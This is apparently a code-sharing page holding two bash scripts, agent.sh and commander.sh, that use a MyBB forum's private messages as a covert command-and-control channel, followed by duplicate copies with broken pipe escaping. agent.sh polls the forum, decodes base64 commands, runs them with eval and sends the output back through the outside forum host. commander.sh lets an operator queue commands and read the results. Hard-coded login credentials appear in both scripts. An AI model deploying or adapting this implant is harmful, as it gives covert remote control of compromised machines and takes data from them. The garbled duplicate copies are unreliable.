tokyoneon/agent.sh

## agent.sh
#!/bin/bash

# https://null-byte.com/turn-forums-into-c-c-servers-0196708/

while true; do
    forumUser="tokyoneon";
    username="tokyoneon@email.com";
    password="treHGFd76547^%$";
    cookies='/tmp/forum_cookies';
    function urlencode ()
    {
        old_lc_collate=$LC_COLLATE;
        LC_COLLATE=C;
        local length="${#1}";
        for ((i = 0; i < length; i++ ))
        do
            local c="${1:i:1}";
            case $c in
                [a-zA-Z0-9.~_-])
                    printf "$c"
                ;;
                *)
                    printf '%%%02X' "'$c"
                ;;
            esac;
        done;
        LC_COLLATE=$old_lc_collate
    };
    enc_username="$(urlencode $username)";
    enc_password="$(urlencode $password)";
    login_request="$(curl -s -X POST --cookie-jar $cookies 'https://mybbforum.com/member.php' --data "username=$enc_username&password=$enc_password&remember=yes&submit=Login&action=do_login&url=https%3A%2F%2Fmybbforum.com%2Findex.php" -o /dev/null 2>&1)";
    inboxCheck="$(curl -s --cookie $cookies 'https://mybbforum.com/private.php')";
    inboxStatus="$(awk -v FS="(\" style=\"font-weight: bold;\">|</a></div> </div> <\!)" '{print $2}' <<< $inboxCheck)";
    if [[ "$inboxStatus" = 'command' ]]; then
        command="$(awk -v FS="(</a> titled <a href=\"|\" style=\"font-weight: bold;\">command)" '{print $2}' <<< $inboxCheck | sed 's/amp;//g')";
        request="$(curl -s --cookie $cookies $command)";
        encCommand="$(awk -v FS="(quote|/quote)" '{print $2}' <<< $request | awk '{print $2}')";
        decCommand="$(base64 -D <<< $encCommand)";
        response="$(eval $decCommand 2>&1 | base64 | tr -d '\n')";
        if [[ -z "$response" ]]; then
            response="$(printf '%s' 'no response detected in the terminal' | base64)";
        fi;
        sleep 61;
        curl -s --cookie "$cookies" 'https://mybbforum.com/private.php?action=send' --data "my_post_key=e18f06e1685bacad0f9d94b0a42e2866&to=$forumUser&bcc=&subject=response&message=$response&action=do_send&pmid=0&do=&submit=Send+Message";
    fi
    sleep 180;
done

## commander.sh
#!/bin/bash

# https://null-byte.com/turn-forums-into-c-c-servers-0196708/

clear;
function msg ()
{
    echo -e "\n [mycc]> $1";
    sleep 1.5
};
forumUser="tokyoneon";
username="tokyoneon@email.com";
password="treHGFd76547^%$";
cookies='/tmp/forum_cookies';
function urlencode ()
{
    old_lc_collate=$LC_COLLATE;
    LC_COLLATE=C;
    local length="${#1}";
    for ((i = 0; i < length; i++ ))
    do
        local c="${1:i:1}";
        case $c in
            [a-zA-Z0-9.~_-])
                printf "$c"
            ;;
            *)
                printf '%%%02X' "'$c"
            ;;
        esac;
    done;
    LC_COLLATE=$old_lc_collate
};
encUsername="$(urlencode $username)";
encPassword="$(urlencode $password)";
function cookie_detect ()
{
    if [[ -n "$(grep -io 'mybbuser' $cookies)" ]]; then
        msg "valid login detected";
    else
        msg "invalid login. check the cookies";
        exit;
    fi
};
function login_request ()
{
    curl -s -X POST --cookie-jar $cookies 'https://mybbforum.com/member.php' --data "username=$encUsername&password=$encPassword&remember=yes&submit=Login&action=do_login&url=https%3A%2F%2Fmybbforum.com%2Findex.php" -o /dev/null 2>&1;
    cookie_detect
};
function fetch_response ()
{
    login_request;
    inboxCheck="$(curl -s --cookie $cookies 'https://mybbforum.com/private.php')";
    inboxStatus="$(grep -oP '(?<=font-weight: bold;">).*?(?=</a></div>)' <<< $inboxCheck)";
    if [[ "$inboxStatus" = 'response' ]]; then
        response="$(grep -oP '(?<=titled <a href=").*?(?=" style)' <<< $inboxCheck | sed 's/amp;//g' | xargs)";
        msg "new inbox message detected";
        request="$(curl -s --cookie "$cookies" "$response")";
        encResponse="$(grep --color=no -A1 'scaleimages" id="pid_">' <<< $request| sed 's/<.*>//;s/<\/.*>//' | xargs)";
        msg "encResponse = $encResponse";
        decResponse="$(base64 -d <<< $encResponse)";
        msg "\n$decResponse";
    else
        msg "no updates found on the server";
    fi
};
function upload_command ()
{
    msg "sleeping for 60 seconds";
    sleep 61;
    encCommand="$(base64 <<< $1 | tr -d '\n')";
    curl -s --cookie "$cookies" 'https://mybbforum.com/private.php?action=send' --data "my_post_key=e18f06e1685bacad0f9d94b0a42e2866&to=$forumUser&bcc=&subject=command&message=$encCommand&action=do_send&pmid=0&do=&submit=Send+Message"
};
function user_command ()
{
    login_request;
    upload_command "$1"
};
function input_args ()
{
    while [[ "$#" != 0 ]]; do
        case "$1" in
            -c | --command)
                if [[ ! -n "$2" ]]; then
                    msg "invalid args. no command submitted.";
                    exit;
                fi;
                user_command "$2"
            ;;
            -f | --fetch)
                fetch_response
            ;;
        esac;
        shift;
    done
};
if [[ ! -n "$1" ]]; then
    msg "invalid arguments, use --fetch or --command";
    exit;
fi;
input_args "$@"
	#!/bin/bash

	# https://null-byte.com/turn-forums-into-c-c-servers-0196708/

	while true; do
	forumUser="tokyoneon";
	username="tokyoneon@email.com";
	password="treHGFd76547^%$";
	cookies='/tmp/forum_cookies';
	function urlencode ()
	{
	old_lc_collate=$LC_COLLATE;
	LC_COLLATE=C;
	local length="${#1}";
	for ((i = 0; i < length; i++ ))
	do
	local c="${1:i:1}";
	case $c in
	[a-zA-Z0-9.~_-])
	printf "$c"
	;;
	*)
	printf '%%%02X' "'$c"
	;;
	esac;
	done;
	LC_COLLATE=$old_lc_collate
	};
	enc_username="$(urlencode $username)";
	enc_password="$(urlencode $password)";
	login_request="$(curl -s -X POST --cookie-jar $cookies 'https://mybbforum.com/member.php' --data "username=$enc_username&password=$enc_password&remember=yes&submit=Login&action=do_login&url=https%3A%2F%2Fmybbforum.com%2Findex.php" -o /dev/null 2>&1)";
	inboxCheck="$(curl -s --cookie $cookies 'https://mybbforum.com/private.php')";
	inboxStatus="$(awk -v FS="(\" style=\"font-weight: bold;\">\|</a></div> </div> <\!)" '{print $2}' <<< $inboxCheck)";
	if [[ "$inboxStatus" = 'command' ]]; then
	command="$(awk -v FS="(</a> titled <a href=\"\|\" style=\"font-weight: bold;\">command)" '{print $2}' <<< $inboxCheck \| sed 's/amp;//g')";
	request="$(curl -s --cookie $cookies $command)";
	encCommand="$(awk -v FS="(quote\|/quote)" '{print $2}' <<< $request \| awk '{print $2}')";
	decCommand="$(base64 -D <<< $encCommand)";
	response="$(eval $decCommand 2>&1 \| base64 \| tr -d '\n')";
	if [[ -z "$response" ]]; then
	response="$(printf '%s' 'no response detected in the terminal' \| base64)";
	fi;
	sleep 61;
	curl -s --cookie "$cookies" 'https://mybbforum.com/private.php?action=send' --data "my_post_key=e18f06e1685bacad0f9d94b0a42e2866&to=$forumUser&bcc=&subject=response&message=$response&action=do_send&pmid=0&do=&submit=Send+Message";
	fi
	sleep 180;
	done
	#!/bin/bash

	# https://null-byte.com/turn-forums-into-c-c-servers-0196708/

	clear;
	function msg ()
	{
	echo -e "\n [mycc]> $1";
	sleep 1.5
	};
	forumUser="tokyoneon";
	username="tokyoneon@email.com";
	password="treHGFd76547^%$";
	cookies='/tmp/forum_cookies';
	function urlencode ()
	{
	old_lc_collate=$LC_COLLATE;
	LC_COLLATE=C;
	local length="${#1}";
	for ((i = 0; i < length; i++ ))
	do
	local c="${1:i:1}";
	case $c in
	[a-zA-Z0-9.~_-])
	printf "$c"
	;;
	*)
	printf '%%%02X' "'$c"
	;;
	esac;
	done;
	LC_COLLATE=$old_lc_collate
	};
	encUsername="$(urlencode $username)";
	encPassword="$(urlencode $password)";
	function cookie_detect ()
	{
	if [[ -n "$(grep -io 'mybbuser' $cookies)" ]]; then
	msg "valid login detected";
	else
	msg "invalid login. check the cookies";
	exit;
	fi
	};
	function login_request ()
	{
	curl -s -X POST --cookie-jar $cookies 'https://mybbforum.com/member.php' --data "username=$encUsername&password=$encPassword&remember=yes&submit=Login&action=do_login&url=https%3A%2F%2Fmybbforum.com%2Findex.php" -o /dev/null 2>&1;
	cookie_detect
	};
	function fetch_response ()
	{
	login_request;
	inboxCheck="$(curl -s --cookie $cookies 'https://mybbforum.com/private.php')";
	inboxStatus="$(grep -oP '(?<=font-weight: bold;">).*?(?=</a></div>)' <<< $inboxCheck)";
	if [[ "$inboxStatus" = 'response' ]]; then
	response="$(grep -oP '(?<=titled <a href=").*?(?=" style)' <<< $inboxCheck \| sed 's/amp;//g' \| xargs)";
	msg "new inbox message detected";
	request="$(curl -s --cookie "$cookies" "$response")";
	encResponse="$(grep --color=no -A1 'scaleimages" id="pid_">' <<< $request\| sed 's/<.>//;s/<\/.>//' \| xargs)";
	msg "encResponse = $encResponse";
	decResponse="$(base64 -d <<< $encResponse)";
	msg "\n$decResponse";
	else
	msg "no updates found on the server";
	fi
	};
	function upload_command ()
	{
	msg "sleeping for 60 seconds";
	sleep 61;
	encCommand="$(base64 <<< $1 \| tr -d '\n')";
	curl -s --cookie "$cookies" 'https://mybbforum.com/private.php?action=send' --data "my_post_key=e18f06e1685bacad0f9d94b0a42e2866&to=$forumUser&bcc=&subject=command&message=$encCommand&action=do_send&pmid=0&do=&submit=Send+Message"
	};
	function user_command ()
	{
	login_request;
	upload_command "$1"
	};
	function input_args ()
	{
	while [[ "$#" != 0 ]]; do
	case "$1" in
	-c \| --command)
	if [[ ! -n "$2" ]]; then
	msg "invalid args. no command submitted.";
	exit;
	fi;
	user_command "$2"
	;;
	-f \| --fetch)
	fetch_response
	;;
	esac;
	shift;
	done
	};
	if [[ ! -n "$1" ]]; then
	msg "invalid arguments, use --fetch or --command";
	exit;
	fi;
	input_args "$@"